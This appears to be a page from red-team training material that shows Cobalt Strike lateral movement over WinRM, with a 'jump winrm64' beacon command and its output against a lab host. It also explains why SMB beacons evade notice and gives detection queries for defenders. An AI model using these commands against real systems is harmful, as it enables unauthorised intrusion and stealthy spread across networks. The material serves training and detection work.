Windows Remote Management
The winrm
and winrm64
methods can be used for 32 and 64-bit targets as appropriate.
The SMB Beacon is an excellent choice when moving laterally, because the SMB protocol is used extensively in a Windows environment, so this traffic blends in very well.
beacon> jump winrm64 web.dev.cyberbotic.io smb
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10) on web.dev.cyberbotic.io via WinRM
[+] host called home, sent: 225172 bytes
[+] established link to child beacon: 10.10.122.30
\
WinRM will return a high integrity Beacon running as the user with which you're interacting with the remote machine as.
\

\
This new Beacon will be running inside wsmprovhost.exe
, which is the "Host process for WinRM plug-ins". This is used whenever WinRM is used, legitimate or otherwise. You can search for process start events, but this will produce a lot of false positives if WinRM is being used legitimately by system administrators.
event.category: process and event.type: start and process.name: wsmprovhost.exe
\
The most likely means of identifying this lateral movement is by searching PowerShell script block logs for known payload artefacts.
event.category: process and powershell.file.script_block_text: "$var_runme.Invoke([IntPtr]::Zero)"
Last updated